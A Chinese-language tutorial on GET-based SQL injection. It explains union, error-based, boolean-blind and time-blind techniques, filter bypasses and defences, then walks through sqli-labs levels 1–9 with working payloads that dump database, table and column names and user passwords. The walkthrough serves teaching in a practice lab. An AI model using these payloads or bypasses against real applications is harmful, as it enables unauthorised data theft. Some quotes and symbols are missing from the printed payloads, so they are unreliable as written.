SQL注入漏洞基础（GET）

SQL注入概述SQL注入是一种常见的网络安全漏洞攻击者通过在应用程序的输入字段中插入恶意SQL代码欺骗数据库执行非预期的命令。登录实例在登录中SQL查询语句select * from 表名 where user用户名 and password密码当我们在登录框输入admin or 11--这段SQL语句就变成了select * from 表名 where useradmin or 11 -- and password 密码在user变量加入的admin or 11--admin后的与前面的闭合or 11 的结果是恒成立的最后的--注释了后面的语句导致漏洞发生登录成功攻击方式1.union联合查询使用union合并多个select语句从而引发漏洞2.报错注入通过构造恶意SQL语句触发数据库错误利用数据库报错信息泄露的数据实现漏洞。3.布尔盲注在无法直接获取数据时我们需要通过网页的变化来判断对错逐步推理出信息引发漏洞。4.时间盲注与布尔盲注基本相同通过·sleep在条件成立时延时返回从而推理出信息实现漏洞。攻击流程1.寻找注入点寻找可能出现注入漏洞的地方使用字符串测试等观察系统响应是否异常2.提取数据利用注入点逐步获取数据库结构信息3.提权尝试提升权限或建立持久化访问常见绕过方式1.大小写绕过黑名单检测时通过夹杂大小写来绕过验证不影响代码执行2.编码绕过·通过URL编码来绕过限制3.双写绕过在关键字会被替换为空的时候我们可以将关键字双写如ununionion中间的关键字被替换剩下的可以组成一个新的关键字4.内联注释绕过在MySQL中注释可以被当作SQL语句执行如/*!select*/ * from table;防御方式1.参数化查询使用预编译语句将SQL代码与数据分离数据库会预先编译SQL结构用户输入仅作为数据处理。2.输入验证与过滤白名单验证只允许特定字符黑名单验证转义或移除危险字符3.最小权限数据库账户只授予必要权限禁止应用账户使用敏感权限靶场演示sqli靶场1.union联合查询在sqli前1-4关均使用union联合查询Less11.判断注入类型注入类型可分为数字型和字符型区别在于闭合形式的不同数字型不需要添加字符闭合字符型需要添加符号闭合SQL语句根据报错信息可以判断出闭合符号。在输入框中输入单引号观察是否报错若出现SQL语法错误可能存在单引号闭合的注入点如图在加入?id1时出现报错则证明时是字符型注入然后我们加入 order by 来确定列数当我们输入 order by 3 正常order by 4 报错时证明有3列然后我们寻找回显点先将id值改为不成立的值比如-1这样只会显示union的结果?id1 union select 1,2,3 --这里显示数字的地方就是回显点我们需要在有回显的地方加入恶意的SQL语句?id-1 union select 1,database(),3 --这里我们加入database()即可获取数据库名接下来取表名?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase() --information库是储存所有表数据的数据库拿到表名接下来取字段名我们查看users表的字段id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schemadatabase() and table_name users --拿到字段名接下来取数据因为有两个回显点所以我们可以一次取多个数据拿到数据后三关基本相似均使用union联合查询只是闭合方式不同Less2数字型注入不需要添加闭合Less3字符型注入使用)闭合Less4字符型注入使用)闭合2.报错注入在无回显位的情况下我们可以用报错注入来利用漏洞通过构造特殊SQL语句触发数据库报错使错误信息中包含数据库结构、表名、字段名或具体数据。报错注入函数updatexml() 报错AND updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1)extractvalue() 报错AND extractvalue(1, concat(0x7e, (SELECT database()), 0x7e))floor() 报错AND (SELECT 1 FROM (SELECT count(*), concat((SELECT user()), floor(rand(0)*2)) x FROM information_schema.tables GROUP BY x) y)在这我使用updatexml()报错演示Less5在这一关中没有回显点所以应该使用报错注入首先判断闭合方式加入发生报错所以是单引号闭合然后我们查数据库id1 and (updatexml(1,concat(0x7e,database(),0x7e),1)); --0x7e是~的十六进制表示用来标记数据边界也可以替换成其他字符拿到数据库名然后我们继续拿表名?id1 and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1)) --拿到表名然后继续拿users表的字段名?id1 and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers),0x7e),1)) --拿到字段名然后拿数据?id1 and (updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)) --拿到数据3.布尔盲注通过观察应用程序对不同布尔条件的响应差异如页面内容变化、HTTP状态码或响应时间来推断数据库中的信息简单来说就是猜。Less8:在这一关中由于无法直接获取查询结果所以我们需要进一步的推测。可以看到并不会返回任何信息我们先判断数据库长度?id1 and (length(database())n)--7时页面正常8时无回显可以判断出数据库长度8接下来继续推理出数据库名称?id1 and (ascii(substr(database(),1,1))n)--这段代码的效果是将数据库名称的第一个字符提取出来并编译为ASCII码然后进行判断取后面几位表只需要更改substr的截取位即可使用二分法来逐步缩小范围对照ASCII码表来判断这里为了省事跳过推理过程数据库名为security接下来推理表判断表数量?id1 and (select count(*) from information_schema.tables where table_schemasecurity)n--判断出表数量为4然后判断表名?id1 and (ascii(substr(select table_name from information_schema.tables where table_schemasecurity limit 0,1)1,1)n))--limit用来限制返回的结果通过修改值来查询不同表。推理出users表同理推出字段?id1 and (select count(*) from information_schema.columns where table_schemasecurity and table_nameusers)n--判断字段数判断出字段数为3然后我们判断字段名?id1 and (ascii(substr(select column_name from information_schema.columns where table_schemasecurity and table_nameusers limit 0,1)1,1)n))--​推理出password列然后推理数据名?id1 and (ascii(substr((select password from users limit 0,1),1,1))n)--就可以推理出数据·由于手工注入的工作量是非常庞大的所以我们可以使用自动化注入工具比如最常见的SQLmap也可以自己编写python脚本4.时间盲注时间盲注过程与布尔盲注相同在页面无变化时用到加入sleep函数在特定条件下延迟响应达到盲注的效果。Less9我们首先进行判断在这一关中不管我们输入的是否成立页面均无区别所以我们需要用到时间盲注?id1 and if(11,sleep(3),1)--判断闭合方式为接下来判断数据库长度?id1 and if((length(database())n),sleep(3),1)--判断数据库长度为8接下来判断数据库名?id1 and if((ascii(substr(database(),1,1))n),sleep(3),1)--其余流程相同在这里就不一一尝试了结束本篇主要讲解SQL注入GET方式的基本注入方式所用靶场sqli其他SQL注入方式会在后面的篇章中讲解。感谢观看。